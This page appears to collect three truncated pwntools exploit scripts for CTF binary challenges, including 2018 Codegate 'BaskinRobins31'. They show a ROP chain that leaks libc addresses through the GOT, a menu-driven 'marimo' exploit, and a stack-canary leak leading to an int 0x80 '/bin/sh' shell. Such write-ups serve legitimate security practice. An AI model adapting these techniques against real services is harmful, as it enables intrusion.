123456789101112131415161718192021222324252627282930313233343536373839404142434445from pwn import * b = '/home/goat/PROB/2018 Codegate/BaskinRobins31'elf = ELF(b)c = process(b) pppr = p64(0x40087a) # pop rdi, pop rsi, pop rdx write_plt = elf.plt['write']write_got = elf.got['write']read_plt = elf.plt['read']strtoul_got = elf.got['strtoul'] pay = ''pay += 'A'*0xb8pay += pppr # leak write's libc add..
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970from pwn import * def smtm(s): s.send('show me the marimo\n') s.recvuntil(">>") s.send('tmp\n') s.recvuntil(">>") s.send('tmp\n') s.recvuntil(">>") def mod(s,pay,sel): s.send('V\n') s.recvuntil(">>") s.send(sel) s.recvuntil(">>") s.send('M\n') s.recvuntil(">>") s.sen..
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556from pwn import * s = remote("127.0.0.1", 8888) pppr = p32(0x806f280) # edx ecx ebxeax = p32(0x8048882)int80 = p32(0x806f870)bss = p32(0x80ea3d0)binsh = "/bin/sh"print "[*] Start" s.recvuntil(": ")s.send("2\n")s.recvuntil(") ")s.send("y\n")s.recvuntil(".\n")s.send(("a"*64)+"x")s.recvn(68) canar..